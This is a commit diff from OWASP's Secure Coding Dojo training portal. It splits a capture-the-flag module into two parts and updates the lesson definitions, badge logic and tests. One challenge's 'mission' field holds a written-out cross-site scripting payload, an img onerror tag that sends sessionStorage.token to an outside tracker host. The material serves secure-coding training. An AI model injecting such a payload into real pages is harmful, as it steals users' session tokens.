Merge pull request #163 from OWASP/split-second-degree

Split second degree
OWASP · Dec 22, 2024 · a46636c · a46636c
2 parents d342a4b + fdfca3f
commit a46636c
Show file tree

Hide file tree

Showing 16 changed files with 105 additions and 97 deletions.
diff --git a/trainingportal/auth.js b/trainingportal/auth.js
@@ -281,10 +281,11 @@ let processAuthCallback = async(profileId, givenName, familyName, email, cb) =>
             user.email = email;
             let modules = challenges.getModules();
             for(let moduleId in modules){
-                let promise = challenges.verifyModuleCompletion(user, moduleId);
-                promise.catch((err) => {
+                try {
+                    await challenges.verifyModuleCompletion(user, moduleId);
+                } catch (error) {
                     util.log("Error with badge verification.", user);
-                });
+                }
             }
         }
         else{

diff --git a/trainingportal/static/challenges.html b/trainingportal/static/challenges.html
@@ -72,7 +72,7 @@ <h4>Play Link and Instructions</h4>
                                 <br/><br/>
                             </span>
                             <p ng-if="!challenge.playLink">
-                                The play link has been provided to you when solving the previous challenge. 
+                                The play link has been provided to you when solving the previous module or challenge. 
                                 If you have missed it read the challenge description carefully and try to figure out what it is.
                             </p>
                             <span ng-if="!challenge.passed">

diff --git a/trainingportal/static/lessons/blackBelt/definitions.json b/trainingportal/static/lessons/blackBelt/definitions.json
@@ -129,15 +129,6 @@
                 "solution":"cwe134.sol.md",
                 "codeBlockIds":["safeMemoryManagement","inputAllowListing"]
             },
-            {
-                "id":"cwe502",
-                "name":"Deserialization of Untrusted Data",
-                "playLink":"/cwe502.jsp",
-                "description": "cwe502.html",
-                "attackGram":"deserialization.png",
-                "solution":"cwe502.sol.md",
-                "codeBlockIds":["enforceSafeDeserialization"]
-            },
             {
                 "id":"quiz",
                 "name":"Quiz", 

diff --git a/trainingportal/static/lessons/modules.json b/trainingportal/static/lessons/modules.json
@@ -30,7 +30,7 @@
         "name":"Black Belt",
         "summary":"Common software security flaws - part 2",
         "description":"Lessons are entry level difficulty aimed at introducing the concepts of vulnerability, exploit and software defense.",
-        "description2":"Includes 14 lessons. Estimated duration 2 hours.",
+        "description2":"Includes 13 lessons. Estimated duration 2 hours.",
         "badgeInfo":{
             "line1":"Secure Coding",
             "line2":"Black Belt",
@@ -39,18 +39,30 @@
         },
         "requiredModules":["greenBelt"]
     },
-    "secondDegreeBlackBelt":{
-        "name":"Second Degree Black Belt",
+    "secondDegreeBlackBelt1":{
+        "name":"Second Degree Black Belt - Part 1",
         "summary":"Cloud software exploitation techniques",
         "description":"Have some fun with this Capture the Flag module which is based on OWASP Top 10. Your goal is to take down the cloud applications used in a worldwide malware campaign.",
         "badgeInfo":{
             "line1":"Secure Coding",
             "line2":"2nd Degree",
             "line3":"Black Belt",
-            "bg":"darkred"
+            "bg":"red"
         },
         "requiredModules":["blackBelt"]
     },
+    "secondDegreeBlackBelt2":{
+        "name":"Second Degree Black Belt - Part 2",
+        "summary":"Cloud software exploitation techniques",
+        "description":"Have some fun with this Capture the Flag module which is based on OWASP Top 10. Your goal is to take down the cloud applications used in a worldwide malware campaign.",
+        "badgeInfo":{
+            "line1":"Secure Coding",
+            "line2":"2nd Degree",
+            "line3":"Black Belt",
+            "bg":"darkred"
+        },
+        "requiredModules":["secondDegreeBlackBelt1"]
+    },
     "redTeam":{
         "name":"Red Team",
         "summary":"Pen-testing tools and techniques",

diff --git a/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json b/trainingportal/static/lessons/secondDegreeBlackBelt/definitions.json
diff --git a/trainingportal/static/lessons/secondDegreeBlackBelt1/definitions.json b/trainingportal/static/lessons/secondDegreeBlackBelt1/definitions.json
@@ -0,0 +1,40 @@
+[
+    {
+        "level":0,
+        "name":"Second Degree Black Belt - Part 1",
+        "challenges":[
+            {
+                "id":"owasp2017misconfig",
+                "name":"Security Misconfiguration", 
+                "playLink":"",
+                "description": "owasp2017misconfig.html",
+                "codeBlockIds":["enforceSafeConfig"],
+                "mission": "Find the secret file."
+            },
+            {
+                "id":"owasp2017sensitive",
+                "name":"Sensitive Data Exposure", 
+                "description": "owasp2017sensitive.html",
+                "attackGram":"missingenc.png",
+                "codeBlockIds":["useStrongDataEncryption"],
+                "mission": "Login as the test user."
+            },
+            {
+                "id":"owasp2017brokenauth",
+                "name":"Broken Authentication & Broken Access Control", 
+                "description": "owasp2017brokenauth.html",
+                "attackGram":"missingauthz.png",
+                "codeBlockIds":["loginBestPractices","principleOfLeastPrivilege","serverSideValidation"],
+                "mission": "View the chat messages."
+            },
+            {
+                "id":"owasp2017xss",
+                "name":"Cross-Site Scripting", 
+                "description": "owasp2017xss.html",
+                "attackGram":"xss.png",
+                "codeBlockIds":["neutralizeOutput","inputAllowListing","requestForgeryPrevention"],
+                "mission":"Alter the html code of the page by inserting the following tag: <img src=bla onerror=\"fetch('https://xss.tracker?token='+sessionStorage.token)\">"
+            }
+        ]
+    }
+]
diff --git a/...dDegreeBlackBelt/owasp2017brokenauth.html → ...DegreeBlackBelt1/owasp2017brokenauth.html b/...dDegreeBlackBelt/owasp2017brokenauth.html → ...DegreeBlackBelt1/owasp2017brokenauth.html
diff --git a/...ndDegreeBlackBelt/owasp2017misconfig.html → ...dDegreeBlackBelt1/owasp2017misconfig.html b/...ndDegreeBlackBelt/owasp2017misconfig.html → ...dDegreeBlackBelt1/owasp2017misconfig.html
diff --git a/...ndDegreeBlackBelt/owasp2017sensitive.html → ...dDegreeBlackBelt1/owasp2017sensitive.html b/...ndDegreeBlackBelt/owasp2017sensitive.html → ...dDegreeBlackBelt1/owasp2017sensitive.html
diff --git a/...s/secondDegreeBlackBelt/owasp2017xss.html → .../secondDegreeBlackBelt1/owasp2017xss.html b/...s/secondDegreeBlackBelt/owasp2017xss.html → .../secondDegreeBlackBelt1/owasp2017xss.html
diff --git a/trainingportal/static/lessons/secondDegreeBlackBelt2/definitions.json b/trainingportal/static/lessons/secondDegreeBlackBelt2/definitions.json
@@ -0,0 +1,32 @@
+[
+    {
+        "level":0,
+        "name":"Second Degree Black Belt - Part 2",
+        "challenges":[
+            {
+                "id":"owasp2017injection",
+                "name":"Injection", 
+                "description": "owasp2017injection.html",
+                "attackGram":"commandinjection.png",
+                "codeBlockIds":["parameterizedCommands","inputAllowListing","principleOfLeastPrivilege"],
+                "mission":"Output the contents of the secret file on internal host 1."
+            },
+            {
+                "id":"owasp2017xxe",
+                "name":"XML External Entities", 
+                "description": "owasp2017xxe.html",
+                "attackGram":"xxe.png",
+                "codeBlockIds":["disableXmlExternalEntities","principleOfLeastPrivilege"],
+                "mission": "Login into the web application hosted on internal host 2."               
+            },
+            {
+                "id":"owasp2017deserialization",
+                "name":"Using Components with Known Vulnerabilities & Insecure Deserialization", 
+                "description": "owasp2017deserialization.html",
+                "attackGram":"deserialization.png",
+                "codeBlockIds":["enforceSafeDeserialization","keep3rdPartyUpToDate"],
+                "mission": "Submit a STOP command object."
+            }
+        ]
+    }
+]
diff --git a/...eeBlackBelt/owasp2017deserialization.html → ...eBlackBelt2/owasp2017deserialization.html b/...eeBlackBelt/owasp2017deserialization.html → ...eBlackBelt2/owasp2017deserialization.html
diff --git a/...ndDegreeBlackBelt/owasp2017injection.html → ...dDegreeBlackBelt2/owasp2017injection.html b/...ndDegreeBlackBelt/owasp2017injection.html → ...dDegreeBlackBelt2/owasp2017injection.html
diff --git a/...s/secondDegreeBlackBelt/owasp2017xxe.html → .../secondDegreeBlackBelt2/owasp2017xxe.html b/...s/secondDegreeBlackBelt/owasp2017xxe.html → .../secondDegreeBlackBelt2/owasp2017xxe.html
diff --git a/trainingportal/test/challenge.test.js b/trainingportal/test/challenge.test.js
@@ -108,13 +108,18 @@ describe('challengeTests', () => {
 
         test('should  issue a badge', async () => {
 
-            let result = await challenges.verifyModuleCompletion(user, "secondDegreeBlackBelt");
+            let result = await challenges.verifyModuleCompletion(user, "secondDegreeBlackBelt1");
             assert.equal(result,true,"Should have completed the module");
+
+            result = await challenges.verifyModuleCompletion(user, "secondDegreeBlackBelt2");
+            assert.equal(result,true,"Should have completed the module");
+
             let promise = db.fetchBadges(user.id);
             let badges = await promise;
             assert.notEqual(null, badges, "badges should NOT be null");
-            assert.equal(badges.length, 1, "Incorrect number of badges");
-            assert.equal(badges[0].moduleId, "secondDegreeBlackBelt", "Wrong badge module");
+            assert.equal(badges.length, 2, "Incorrect number of badges");
+            assert.equal(badges[0].moduleId, "secondDegreeBlackBelt1", "Wrong badge module");
+            assert.equal(badges[1].moduleId, "secondDegreeBlackBelt2", "Wrong badge module");
             //cleanup
             return promise;
         });

diff --git a/trainingportal/tools/devSetup.js b/trainingportal/tools/devSetup.js
@@ -17,10 +17,11 @@ async function setup(){
         await db.getPromise(db.insertUser, dojoUserInfo);
         auth.createUpdateUserInternal("dojouser", dojoUserInfo, "SecureCodingDojo");
 
-        util.log("Unlocking all challenges for 'dojouser'");
+        util.log("Unlocking challenges for 'dojouser'");
         let user = await db.getPromise(db.getUser,"Local_dojouser");
-        await challengeUtil.passChallenges("securityCodeReviewMaster",user,["codereview101_indirectReferences"]);
-        await challengeUtil.passChallenges("blackBelt",user,["cwe502"]);
+        await challengeUtil.passChallenges("securityCodeReviewMaster",user,[]);
+        await challengeUtil.passChallenges("greenBelt",user,[]);
+        await challengeUtil.passChallenges("blackBelt",user,["cwe134"]);
 
     } catch (error) {
         console.error(error);